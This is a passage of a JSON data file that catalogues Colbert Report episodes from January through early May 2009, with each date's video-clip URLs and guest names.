      "videos": [
        "http://thecolbertreport.cc.com/videos/oyml2f/intro---01-14-09",
        "http://thecolbertreport.cc.com/videos/34mj4v/the-last-bush-effigy",
        "http://thecolbertreport.cc.com/videos/y0f472/p-k--winsome---obama-collectibles",
        "http://thecolbertreport.cc.com/videos/ur3zl1/little-victories---america-s-galaxy-is-big",
        "http://thecolbertreport.cc.com/videos/gizrjk/alan-khazei",
        "http://thecolbertreport.cc.com/videos/9hlcm3/commemorative-plates"
      ],
      "guest": "Alan Khazei"
    },
    {
      "date": "2009-01-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/q7vz1i/intro---01-15-09",
        "http://thecolbertreport.cc.com/videos/95lbi6/bush-and-the-press",
        "http://thecolbertreport.cc.com/videos/sy3mow/bush-s-romance-with-the-media---david-gregory",
        "http://thecolbertreport.cc.com/videos/7iuuwa/tip-wag---monkey-on-the-lam",
        "http://thecolbertreport.cc.com/videos/ux2atw/shepard-fairey",
        "http://thecolbertreport.cc.com/videos/wfge8o/spay-and-neuter-your-pets"
      ],
      "guest": "David Gregory, Shepard Fairey"
    },
    {
      "date": "2009-01-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/r1uwlh/intro---01-19-09",
        "http://thecolbertreport.cc.com/videos/ul1a7j/mlk-day-mascot",
        "http://thecolbertreport.cc.com/videos/lypf68/the-word---sacrifice",
        "http://thecolbertreport.cc.com/videos/ydvpvb/frank-rich",
        "http://thecolbertreport.cc.com/videos/52s3oy/boiling-frog-metaphor"
      ],
      "guest": "Frank Rich"
    },
    {
      "date": "2009-01-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ymrs37/stephen-s-inauguration-breakdown",
        "http://thecolbertreport.cc.com/videos/301bds/p-k--winsome---inauguration-merchandise",
        "http://thecolbertreport.cc.com/videos/9hjhcy/stephen-s-sound-advice---how-to-be-like-lincoln",
        "http://thecolbertreport.cc.com/videos/mmoodw/jabari-asim",
        "http://thecolbertreport.cc.com/videos/kai9la/stephen-realizes-he-s-black"
      ],
      "guest": "Jabari Asim"
    },
    {
      "date": "2009-01-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dl8i2q/intro---01-21-09",
        "http://thecolbertreport.cc.com/videos/l2d6st/president-yo-yo-ma",
        "http://thecolbertreport.cc.com/videos/axsw46/election-2012---chuck-todd",
        "http://thecolbertreport.cc.com/videos/xkmfex/stephen-s-remix-challenge",
        "http://thecolbertreport.cc.com/videos/8l6srp/elizabeth-alexander",
        "http://thecolbertreport.cc.com/videos/a3p8mj/good-night"
      ],
      "guest": "Elizabeth Alexander"
    },
    {
      "date": "2009-01-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0zgr4t/intro---01-22-09",
        "http://thecolbertreport.cc.com/videos/t6meak/near-president-obama",
        "http://thecolbertreport.cc.com/videos/mtzrkq/un-american-news---president-obama-edition",
        "http://thecolbertreport.cc.com/videos/689o7m/better-know-a-lobby---naacp",
        "http://thecolbertreport.cc.com/videos/8awmoy/jon-meacham",
        "http://thecolbertreport.cc.com/videos/ili9if/refreshing-sierra-mist"
      ],
      "guest": "Jon Meacham"
    },
    {
      "date": "2009-01-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7nxt06/intro---01-26-09",
        "http://thecolbertreport.cc.com/videos/4oz085/stephen-s-secret-prison",
        "http://thecolbertreport.cc.com/videos/cw8n8j/obama-s-new-science-policy---chris-mooney",
        "http://thecolbertreport.cc.com/videos/yxtpn8/tip-wag---john-yarmuth-s-holiday-card",
        "http://thecolbertreport.cc.com/videos/uj76wp/ed-young",
        "http://thecolbertreport.cc.com/videos/49ccbt/1-877-sean-930"
      ],
      "guest": "Chris Mooney, Ed Young"
    },
    {
      "date": "2009-01-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rwx1ie/intro---01-27-09",
        "http://thecolbertreport.cc.com/videos/8ws8hw/al-arabiya-kidnaps-obama",
        "http://thecolbertreport.cc.com/videos/ei15xx/cheating-death---lung-health",
        "http://thecolbertreport.cc.com/videos/yzw1s5/bill-o-reilly-doesn-t-report-rumors",
        "http://thecolbertreport.cc.com/videos/7ljyqd/philippe-petit",
        "http://thecolbertreport.cc.com/videos/qx6mra/omar-returns"
      ],
      "guest": "Philippe Petit"
    },
    {
      "date": "2009-01-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mrairj/exclusive---better-know-a-beatle---paul-mccartney",
        "http://thecolbertreport.cc.com/videos/qfnuqn/intro---01-28-09",
        "http://thecolbertreport.cc.com/videos/4c854b/countdown-to-atomic-disaster---the-wing-ageddon",
        "http://thecolbertreport.cc.com/videos/m2fb3c/denis-dutton",
        "http://thecolbertreport.cc.com/videos/x3yxrz/call-1-877-sean-930"
      ],
      "guest": "Paul McCartney, Denis Dutton"
    },
    {
      "date": "2009-01-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/s0jwx0/intro---01-29-09",
        "http://thecolbertreport.cc.com/videos/7k3noc/rod-blagojevich-is-impeached",
        "http://thecolbertreport.cc.com/videos/05hiht/the-word---the-audacity-of-nope",
        "http://thecolbertreport.cc.com/videos/ra6q6v/sport-report---chicken-wing-spokesman-richard-lobb",
        "http://thecolbertreport.cc.com/videos/n7s40p/john-podesta",
        "http://thecolbertreport.cc.com/videos/t92qhf/goodnight-illinois-gov--patrick-quinn"
      ],
      "guest": "John Podesta"
    },
    {
      "date": "2009-02-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2e9hx6/intro---02-02-09",
        "http://thecolbertreport.cc.com/videos/qx0vt7/the-lilly-ledbetter-fair-pay-act",
        "http://thecolbertreport.cc.com/videos/3n4xx4/it-could-be-worse---iceland",
        "http://thecolbertreport.cc.com/videos/9kc6le/nailed--em---amtrak-photographer",
        "http://thecolbertreport.cc.com/videos/1tdafu/dan-zaccagnino",
        "http://thecolbertreport.cc.com/videos/z0ddpw/so-long--farewell"
      ],
      "guest": "Dan Zaccagnino"
    },
    {
      "date": "2009-02-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5d9tuo/intro---02-03-09",
        "http://thecolbertreport.cc.com/videos/cfzmri/tom-daschle-steps-down",
        "http://thecolbertreport.cc.com/videos/b8o45v/the-word---army-of-one",
        "http://thecolbertreport.cc.com/videos/eo7n2c/colbert-platinum---ass-covering-edition",
        "http://thecolbertreport.cc.com/videos/lr21yl/henry-louis-gates--jr-",
        "http://thecolbertreport.cc.com/videos/fz6ra7/all-the-show-we-have-time-for"
      ],
      "guest": "Henry Louis Gates Jr."
    },
    {
      "date": "2009-02-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hm493e/intro---02-04-09",
        "http://thecolbertreport.cc.com/videos/7z1jvo/stephen-verbally-thrashes-steve-martin",
        "http://thecolbertreport.cc.com/videos/1t7nor/yahweh-or-no-way---the-super-bowl",
        "http://thecolbertreport.cc.com/videos/vtzs6d/who-s-not-honoring-me-now----the-newberry-awards",
        "http://thecolbertreport.cc.com/videos/7z3biy/tell-your-friends"
      ],
      "guest": "Steve Martin"
    },
    {
      "date": "2009-02-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/oqo6m1/intro---02-05-09",
        "http://thecolbertreport.cc.com/videos/hkvbbb/stelephant-colbert-the-elephant-seal",
        "http://thecolbertreport.cc.com/videos/7v0jg2/economic-stimulus-debate",
        "http://thecolbertreport.cc.com/videos/9xbuuq/economic-stimulus-bill---james-surowiecki",
        "http://thecolbertreport.cc.com/videos/e378n6/alpha-dog-of-the-week---boy-scouts-of-america",
        "http://thecolbertreport.cc.com/videos/avti1a/jonah-lehrer",
        "http://thecolbertreport.cc.com/videos/qj4lmo/keep-your-friends-close"
      ],
      "guest": "James Surowiecki, Jonah Lehrer"
    },
    {
      "date": "2009-02-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vp4fvu/intro---02-09-09",
        "http://thecolbertreport.cc.com/videos/it28fw/the-new-word-czar",
        "http://thecolbertreport.cc.com/videos/13lrs0/threatdown---gay-divorce",
        "http://thecolbertreport.cc.com/videos/hr5hvl/al-gore-steals-stephen-s-grammy"
      ],
      "guest": "TV on the Radio"
    },
    {
      "date": "2009-02-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fv48bo/intro---02-10-09",
        "http://thecolbertreport.cc.com/videos/mj9pcq/the-visa-black-card",
        "http://thecolbertreport.cc.com/videos/l6kty8/the-word---loyal-opposition",
        "http://thecolbertreport.cc.com/videos/nj38bb/shout-out---honey--counterterrorism---an-old-guard-flag",
        "http://thecolbertreport.cc.com/videos/9w33a7/robert-ballard",
        "http://thecolbertreport.cc.com/videos/gissod/you-look-like-stephen"
      ],
      "guest": "Robert Ballard"
    },
    {
      "date": "2009-02-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/smxfup/intro---02-11-09",
        "http://thecolbertreport.cc.com/videos/l5ealo/westminster-dog-show-snub---formula-40-woof",
        "http://thecolbertreport.cc.com/videos/jxgbb9/dc-voting-rights-act---eleanor-holmes-norton",
        "http://thecolbertreport.cc.com/videos/wfrwar/truth-from-the-gut",
        "http://thecolbertreport.cc.com/videos/42vhyq/steven-pinker",
        "http://thecolbertreport.cc.com/videos/tpb22v/good-night----except-for-the-west-coast"
      ],
      "guest": "Eleanor Holmes Norton, Steven Pinker"
    },
    {
      "date": "2009-02-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/m1tx5d/exclusive---stephen-s-sexiest-moments",
        "http://thecolbertreport.cc.com/videos/f0688o/obama-poster-debate---david-ross-and-ed-colbert",
        "http://thecolbertreport.cc.com/videos/vgbtpp/the-dacolbert-code---oscar-predictions",
        "http://thecolbertreport.cc.com/videos/tbf4y6/adam-gopnik",
        "http://thecolbertreport.cc.com/videos/okmu84/goodbye--conan-o-brien"
      ],
      "guest": "David Ross, Ed Colbert, Adam Gopnik"
    },
    {
      "date": "2009-02-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9ynh43/intro---02-23-09",
        "http://thecolbertreport.cc.com/videos/xlgfrl/stephen-s-prayer-day",
        "http://thecolbertreport.cc.com/videos/legx6j/stephen-s-moral-dimension",
        "http://thecolbertreport.cc.com/videos/om9959/helen-fisher"
      ],
      "guest": "Father James Martin, Helen Fisher"
    },
    {
      "date": "2009-02-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mngx54/mardi-gras-celebrations",
        "http://thecolbertreport.cc.com/videos/9jcm4g/1997-flashback",
        "http://thecolbertreport.cc.com/videos/pljjhc/nailed--em---buffet-crime",
        "http://thecolbertreport.cc.com/videos/n75sz3/cliff-sloan",
        "http://thecolbertreport.cc.com/videos/yg82dj/happy-mardi-gras",
        "http://thecolbertreport.cc.com/videos/823sva/turning-to-religion---jim-martin",
        "http://thecolbertreport.cc.com/videos/gks8m8/breaded-fish-sticks"
      ],
      "guest": "Cliff Sloan"
    },
    {
      "date": "2009-02-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4v3vka/intro---02-25-09",
        "http://thecolbertreport.cc.com/videos/fbot0q/obama-s-congressional-address---jindal-s-response",
        "http://thecolbertreport.cc.com/videos/o1f5mr/tip-wag---gorilla-crabs-and-gandhi-s-shoes",
        "http://thecolbertreport.cc.com/videos/jyyb0h/john-fetterman",
        "http://thecolbertreport.cc.com/videos/10ufmk/bears---balls---company-bailouts"
      ],
      "guest": "John Fetterman"
    },
    {
      "date": "2009-02-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lvfhs2/intro---02-26-09",
        "http://thecolbertreport.cc.com/videos/1q3zjs/claire-mccaskill-s-twittering",
        "http://thecolbertreport.cc.com/videos/5j9jjo/conservative-rap-battle---stephen-challenges-michael-steele",
        "http://thecolbertreport.cc.com/videos/831wm1/kris-kristofferson",
        "http://thecolbertreport.cc.com/videos/lh0vwj/the-word---ablacknophobia",
        "http://thecolbertreport.cc.com/videos/um02qq/analog-tv"
      ],
      "guest": "Kris Kristofferson"
    },
    {
      "date": "2009-03-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tfciz3/conservative-rap-battle---michael-steele-gets-served",
        "http://thecolbertreport.cc.com/videos/xtntgt/snow-in-the-studio",
        "http://thecolbertreport.cc.com/videos/52t6yh/p-k--winsome---defective-obama-collectibles",
        "http://thecolbertreport.cc.com/videos/j78ngs/david-byrne"
      ],
      "guest": "David Byrne"
    },
    {
      "date": "2009-03-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qs5iv1/beer-pong-herpes-outbreak",
        "http://thecolbertreport.cc.com/videos/0c92nb/guns-for-roses",
        "http://thecolbertreport.cc.com/videos/l9p0ah/space-module--colbert---name-nasa-s-node-3-after-stephen",
        "http://thecolbertreport.cc.com/videos/oayyzq/mark-bittman",
        "http://thecolbertreport.cc.com/videos/tfciz3/conservative-rap-battle---michael-steele-gets-served"
      ],
      "guest": "Mark Bittman"
    },
    {
      "date": "2009-03-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/n8kt9r/intro---03-04-09",
        "http://thecolbertreport.cc.com/videos/kob10w/space-module--colbert---scientology-s-new-galactic-overlord",
        "http://thecolbertreport.cc.com/videos/9opkqc/doom-bunker---jack-jacobs-and-stephen-moore",
        "http://thecolbertreport.cc.com/videos/sx98t6/carl-wilson",
        "http://thecolbertreport.cc.com/videos/239tij/goodnight",
        "http://thecolbertreport.cc.com/videos/1kkbbd/intro---03-03-09",
        "http://thecolbertreport.cc.com/videos/00d1sm/the-word---share-the-wealth",
        "http://thecolbertreport.cc.com/videos/nhjls5/the-murderer-was-derek"
      ],
      "guest": "Carl Wilson"
    },
    {
      "date": "2009-03-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ej854l/intro---03-05-09",
        "http://thecolbertreport.cc.com/videos/w194ds/obama-s-swing-set",
        "http://thecolbertreport.cc.com/videos/a7l1re/tip-wag---rush-limbaugh",
        "http://thecolbertreport.cc.com/videos/n8dlml/steven-johnson",
        "http://thecolbertreport.cc.com/videos/nfx4fy/leave-you-wanting-more",
        "http://thecolbertreport.cc.com/videos/1y41q9/doom-bunker---glenn-beck-s--war-room-"
      ],
      "guest": "Steven Johnson"
    },
    {
      "date": "2009-03-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/itgd4m/intro---03-09-09",
        "http://thecolbertreport.cc.com/videos/4bvnlr/new-baby-abraham-carter-grosz",
        "http://thecolbertreport.cc.com/videos/z9c9ak/better-know-a-district---wyoming-s-at-large---cynthia-lummis",
        "http://thecolbertreport.cc.com/videos/54ad8f/lisa-hannigan"
      ],
      "guest": "Lisa Hannigan"
    },
    {
      "date": "2009-03-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1h7cfe/intro---03-10-09",
        "http://thecolbertreport.cc.com/videos/i1w6au/conservative-rap-battle---droppin--science-on-michael-steele",
        "http://thecolbertreport.cc.com/videos/858jnr/coffee-induced-hallucinations",
        "http://thecolbertreport.cc.com/videos/ogsw1c/jay-keasling",
        "http://thecolbertreport.cc.com/videos/ovf9hb/sick-three-way",
        "http://thecolbertreport.cc.com/videos/mtwuig/exclusive---better-know-a-district---wyoming-s-at-large---cynthia-lummis",
        "http://thecolbertreport.cc.com/videos/psylhz/the-word---locked-and-loathed",
        "http://thecolbertreport.cc.com/videos/dw94ms/sleep-tight--abraham"
      ],
      "guest": "William Gerstenmaier, Dr. Jay Keasling"
    },
    {
      "date": "2009-03-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/sa3out/intro---03-11-09",
        "http://thecolbertreport.cc.com/videos/4sbc36/earmarks-abuse-ends-tomorrow",
        "http://thecolbertreport.cc.com/videos/7bt4s0/cheating-death---legal--sweat---pre-natal-health",
        "http://thecolbertreport.cc.com/videos/rovggj/howard-fineman",
        "http://thecolbertreport.cc.com/videos/vpswgr/stephen-s-encore",
        "http://thecolbertreport.cc.com/videos/m6st31/space-module--colbert---william-gerstenmaier"
      ],
      "guest": "Howard Fineman"
    },
    {
      "date": "2009-03-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xum4x8/intro---03-12-09",
        "http://thecolbertreport.cc.com/videos/uvfw3m/mahmoud-s-non-consensual-endorsement-deal",
        "http://thecolbertreport.cc.com/videos/p4j2xc/craziest-f--king-thing-i-ve-ever-heard---barreleye-fish",
        "http://thecolbertreport.cc.com/videos/8nmnda/peter-singer",
        "http://thecolbertreport.cc.com/videos/8tqo3i/goodnight",
        "http://thecolbertreport.cc.com/videos/xjpl01/the-word---rand-illusion"
      ],
      "guest": "Simon Johnson, Peter Singer"
    },
    {
      "date": "2009-03-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8zwa7x/intro---03-16-09",
        "http://thecolbertreport.cc.com/videos/yz9sik/stephen-s-angry-mob-will-crush-aig",
        "http://thecolbertreport.cc.com/videos/pe3tou/better-know-a-governor---mark-sanford-update",
        "http://thecolbertreport.cc.com/videos/ck0fd5/neil-gaiman",
        "http://thecolbertreport.cc.com/videos/qxrsxr/stephen-wants-to-hug-you"
      ],
      "guest": "Jonathan Chait, Neil Gaiman"
    },
    {
      "date": "2009-03-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ogmrdd/intro---03-17-09",
        "http://thecolbertreport.cc.com/videos/v1zxe6/shout-out---the-colbert-report-overseas",
        "http://thecolbertreport.cc.com/videos/bsv6p7/world-of-nahlej---shmeat",
        "http://thecolbertreport.cc.com/videos/7byrkj/david-grann",
        "http://thecolbertreport.cc.com/videos/zrpt32/persian-gulf-countdown-clock",
        "http://thecolbertreport.cc.com/videos/59sfdt/the-new-deal---jonathan-chait"
      ],
      "guest": "David Grann"
    },
    {
      "date": "2009-03-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/u70zrc/intro---03-18-09",
        "http://thecolbertreport.cc.com/videos/an5849/predator-x-discovery",
        "http://thecolbertreport.cc.com/videos/fnlgez/tip-wag---mississippi--talk-shows---syfy",
        "http://thecolbertreport.cc.com/videos/5hu17z/juan-cole",
        "http://thecolbertreport.cc.com/videos/bokh2r/sam-s-club-time",
        "http://thecolbertreport.cc.com/videos/3i8x9a/colbert-aluminum---cigar-nubs--faux-poor---blixseth"
      ],
      "guest": "Juan Cole"
    },
    {
      "date": "2009-03-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ntnm0v/intro---03-19-09",
        "http://thecolbertreport.cc.com/videos/tkjk8k/bill-posey-alligator-rumors",
        "http://thecolbertreport.cc.com/videos/oi2fxr/when-animals-attack-our-morals---chimps--lizards---spiders",
        "http://thecolbertreport.cc.com/videos/m9oys8/john-mccardell",
        "http://thecolbertreport.cc.com/videos/f189zq/space-module--colbert---vote-now",
        "http://thecolbertreport.cc.com/videos/wa8cs2/the-word---keeping-our-heads"
      ],
      "guest": "John McCardell"
    },
    {
      "date": "2009-03-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hta8xf/intro---03-30-09",
        "http://thecolbertreport.cc.com/videos/04agpr/violence-in-mexico",
        "http://thecolbertreport.cc.com/videos/ttpqpq/me-time---emily-yoffe-on-narcissistic-personality-disorder",
        "http://thecolbertreport.cc.com/videos/y6yflv/space-module--colbert---democracy-in-orbit",
        "http://thecolbertreport.cc.com/videos/yz8bqz/derrick-pitts"
      ],
      "guest": "Derrick Pitts"
    },
    {
      "date": "2009-03-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/prw3dp/intro---03-31-09",
        "http://thecolbertreport.cc.com/videos/ga9h1c/obama-s-epic-dog-quest",
        "http://thecolbertreport.cc.com/videos/19bdth/better-know-a-lobby---newspaper-association-of-america",
        "http://thecolbertreport.cc.com/videos/fkt6tu/david-plotz",
        "http://thecolbertreport.cc.com/videos/ch71k9/sudoku-answers",
        "http://thecolbertreport.cc.com/videos/7l6w83/me-time---american-narcissism",
        "http://thecolbertreport.cc.com/videos/k0knxh/30-minute-applause"
      ],
      "guest": "David Plotz"
    },
    {
      "date": "2009-04-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/du0pk9/intro---04-01-09",
        "http://thecolbertreport.cc.com/videos/1o1nya/french-worker-protests",
        "http://thecolbertreport.cc.com/videos/5t3340/cheating-death---sperm-sale---colonoscopies",
        "http://thecolbertreport.cc.com/videos/wol3qg/dambisa-moyo",
        "http://thecolbertreport.cc.com/videos/vof9z5/hide-and-seek",
        "http://thecolbertreport.cc.com/videos/jt0f3j/the-10-31-project"
      ],
      "guest": "Dambisa Moyo"
    },
    {
      "date": "2009-04-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/scsjxw/intro---04-02-09",
        "http://thecolbertreport.cc.com/videos/78s5oz/cheney-s-secret-assassination-squad",
        "http://thecolbertreport.cc.com/videos/mkb4ls/merriam-webster-s-word-s-worth",
        "http://thecolbertreport.cc.com/videos/4qhn4o/biz-stone",
        "http://thecolbertreport.cc.com/videos/5uxqom/let-your-gps-be-your-guide",
        "http://thecolbertreport.cc.com/videos/idkq46/the-word---fine-line"
      ],
      "guest": "Biz Stone"
    },
    {
      "date": "2009-04-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/d5ju1a/colbert-s-easter-parade",
        "http://thecolbertreport.cc.com/videos/v1ybgk/intro---04-06-09",
        "http://thecolbertreport.cc.com/videos/f3bajc/body-loss",
        "http://thecolbertreport.cc.com/videos/y3ocaq/space-module--colbert---urine-recycling-room",
        "http://thecolbertreport.cc.com/videos/2zq8u0/rich-lowry",
        "http://thecolbertreport.cc.com/videos/k9vxpy/make-lemonade"
      ],
      "guest": "Tom Brokaw, Rich Lowry"
    },
    {
      "date": "2009-04-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/168lgg/intro---04-07-09",
        "http://thecolbertreport.cc.com/videos/9kk3jy/queen-noor-s-royal-treatment",
        "http://thecolbertreport.cc.com/videos/6uykwu/better-know-a-district---new-york-s-25th---dan-maffei",
        "http://thecolbertreport.cc.com/videos/31tszu/queen-noor",
        "http://thecolbertreport.cc.com/videos/pqumra/hiccup-free",
        "http://thecolbertreport.cc.com/videos/njp3xz/un-american-news---rest-of-the-world",
        "http://thecolbertreport.cc.com/videos/u5yf3y/obama-s-european-trip---tom-brokaw"
      ],
      "guest": "Queen Noor"
    },
    {
      "date": "2009-04-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/f1gjz4/intro---04-08-09",
        "http://thecolbertreport.cc.com/videos/lyeuyj/birkat-hachama---stephen-frees-his-jews",
        "http://thecolbertreport.cc.com/videos/10cwvc/alpha-dog-of-the-week---ted-stevens",
        "http://thecolbertreport.cc.com/videos/eknw52/phil-bronstein",
        "http://thecolbertreport.cc.com/videos/jmb43t/electronic-edition",
        "http://thecolbertreport.cc.com/videos/7jw15b/the-word---morally-bankrupt"
      ],
      "guest": "Phil Bronstein"
    },
    {
      "date": "2009-04-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ly7fhn/workers--comp-temptation",
        "http://thecolbertreport.cc.com/videos/1adwqk/threatdown---robert-gates--dog-seders---obama",
        "http://thecolbertreport.cc.com/videos/lywaay/bart-ehrman",
        "http://thecolbertreport.cc.com/videos/vd2m1k/stephen-s-severed-head",
        "http://thecolbertreport.cc.com/videos/4wgqsm/where-and-when-is-stephen-going-to-the-persian-gulf----bahrain"
      ],
      "guest": "Bart Ehrman"
    },
    {
      "date": "2009-04-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uvnlz3/intro---04-14-09",
        "http://thecolbertreport.cc.com/videos/1tgxfo/clarence-thomas--new-job",
        "http://thecolbertreport.cc.com/videos/bz4xly/space-module--colbert---sunita-williams",
        "http://thecolbertreport.cc.com/videos/gxfl4g/susie-orbach",
        "http://thecolbertreport.cc.com/videos/5m2sci/goodnight--helen"
      ],
      "guest": "Sunita L. Williams, Susie Orbach"
    },
    {
      "date": "2009-04-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2t8bkw/intro---04-15-09",
        "http://thecolbertreport.cc.com/videos/whfbdu/obama-denies-habeas-corpus",
        "http://thecolbertreport.cc.com/videos/xkxq0s/better-know-a-district---illinois--18th---aaron-schock",
        "http://thecolbertreport.cc.com/videos/0ca7u5/jim-lehrer",
        "http://thecolbertreport.cc.com/videos/g6fu2q/homework-assignment",
        "http://thecolbertreport.cc.com/videos/5rzknc/the-word---have-your-cake-and-eat-it--too"
      ],
      "guest": "Jim Lehrer"
    },
    {
      "date": "2009-04-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/t8chps/intro---04-16-09",
        "http://thecolbertreport.cc.com/videos/abfalc/teabagging-protests",
        "http://thecolbertreport.cc.com/videos/npq9t7/indian-elections---kanishk-tharoor",
        "http://thecolbertreport.cc.com/videos/btde8y/douglas-kmiec",
        "http://thecolbertreport.cc.com/videos/gu6q0n/goodnight-salute",
        "http://thecolbertreport.cc.com/videos/a8qba2/tax-atax"
      ],
      "guest": "Kanishk Tharoor, Doug Kmiec"
    },
    {
      "date": "2009-04-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/b06wzj/intro---04-20-09",
        "http://thecolbertreport.cc.com/videos/3g58oe/castro-death-wish-list",
        "http://thecolbertreport.cc.com/videos/pzg5id/maersk-alabama---ken-quinn",
        "http://thecolbertreport.cc.com/videos/b1hfbd/tip-wag---texas-secession---maca",
        "http://thecolbertreport.cc.com/videos/qi09sh/joe-arpaio"
      ],
      "guest": "Ken Quinn, Sheriff Joe Arpaio"
    },
    {
      "date": "2009-04-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fll3xv/intro---04-21-09",
        "http://thecolbertreport.cc.com/videos/mnalwu/george-will-s-demon-denim",
        "http://thecolbertreport.cc.com/videos/hezs49/who-s-riding-my-coattails-now----blown-away-by-the-usa",
        "http://thecolbertreport.cc.com/videos/7lqvgy/mike-krzyzewski",
        "http://thecolbertreport.cc.com/videos/4dj3xs/special-dvd-commentary",
        "http://thecolbertreport.cc.com/videos/g9ilpe/anger-s-aweigh",
        "http://thecolbertreport.cc.com/videos/h6pabb/stephen-s-only-regrets"
      ],
      "guest": "Coach Mike Kryzewski"
    },
    {
      "date": "2009-04-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/licvuz/intro---04-22-09",
        "http://thecolbertreport.cc.com/videos/g6q0sp/-the-price-is-right--goes-green",
        "http://thecolbertreport.cc.com/videos/7ax5b6/where-and-when-is-stephen-going-to-the-persian-gulf----qatar",
        "http://thecolbertreport.cc.com/videos/ui31iq/ira-glass",
        "http://thecolbertreport.cc.com/videos/77b5v5/never-go-to-bed-angry",
        "http://thecolbertreport.cc.com/videos/zbqudz/the-word---stressed-position"
      ],
      "guest": "Ira Glass"
    },
    {
      "date": "2009-04-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/gj1jdr/intro---04-23-09",
        "http://thecolbertreport.cc.com/videos/16z7m7/america-does-not-swear-on-camera",
        "http://thecolbertreport.cc.com/videos/dbshcz/illegitimate-grandson-of-an-alligator",
        "http://thecolbertreport.cc.com/videos/2tn51j/elizabeth-bintliff",
        "http://thecolbertreport.cc.com/videos/ylolny/goodnight--daisy",
        "http://thecolbertreport.cc.com/videos/g1doyw/summit-of-all-fears"
      ],
      "guest": "Elizabeth Bintliff"
    },
    {
      "date": "2009-04-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ak2bbq/intro---04-27-09",
        "http://thecolbertreport.cc.com/videos/u3yqqg/days-of-swine-and-doses",
        "http://thecolbertreport.cc.com/videos/ioe7hh/craziest-f--king-thing-i-ve-ever-heard---fir-tree-lung",
        "http://thecolbertreport.cc.com/videos/6ywn6l/a-rare-correction---stephen-eats-an-ewok",
        "http://thecolbertreport.cc.com/videos/jlx2r1/the-decemberists"
      ],
      "guest": "The Decemberists"
    },
    {
      "date": "2009-04-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5phyy1/intro---04-28-09",
        "http://thecolbertreport.cc.com/videos/pwdiki/arlen-specter-contracts-donkey-flu",
        "http://thecolbertreport.cc.com/videos/14mfow/foreign-reporting---richard-engel",
        "http://thecolbertreport.cc.com/videos/u40xb8/daniel-gross",
        "http://thecolbertreport.cc.com/videos/l8q5cp/shout-out---kids-edition"
      ],
      "guest": "Richard Engel, Daniel Gross"
    },
    {
      "date": "2009-04-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/we8zzj/intro---04-29-09",
        "http://thecolbertreport.cc.com/videos/0gktuh/ahmadinejad-steals-obama-s-slogan",
        "http://thecolbertreport.cc.com/videos/ou4xko/enemy-swine--a-pigcalypse-now",
        "http://thecolbertreport.cc.com/videos/i5hw2i/david-kessler",
        "http://thecolbertreport.cc.com/videos/seesef/feet-teeth",
        "http://thecolbertreport.cc.com/videos/5kllsr/where-and-when-is-stephen-going-to-the-persian-gulf----correspondents",
        "http://thecolbertreport.cc.com/videos/ewzt0z/no-animals-were-harmed"
      ],
      "guest": "David Kessler"
    },
    {
      "date": "2009-04-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4ncl78/intro---04-30-09",
        "http://thecolbertreport.cc.com/videos/hr47fj/president-obama---the-first-14-mondays",
        "http://thecolbertreport.cc.com/videos/zhiu9l/ethan-nadelmann",
        "http://thecolbertreport.cc.com/videos/1e83az/the-after-show",
        "http://thecolbertreport.cc.com/videos/dnh80p/i-s-on-edjukashun---textbooks--americorps---strip-search"
      ],
      "guest": "Jonathan Alter, Ethan Nadelman"
    },
    {
      "date": "2009-05-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ithaxo/code-word---empathy",
        "http://thecolbertreport.cc.com/videos/e4d421/the-prescott-group-bailout",
        "http://thecolbertreport.cc.com/videos/57pcxy/j-j--abrams",
        "http://thecolbertreport.cc.com/videos/3q06z6/sign-off---colbert-nation-home"
      ],
      "guest": "J.J. Abrams"
    },
    {
      "date": "2009-05-05",
      "videos": [
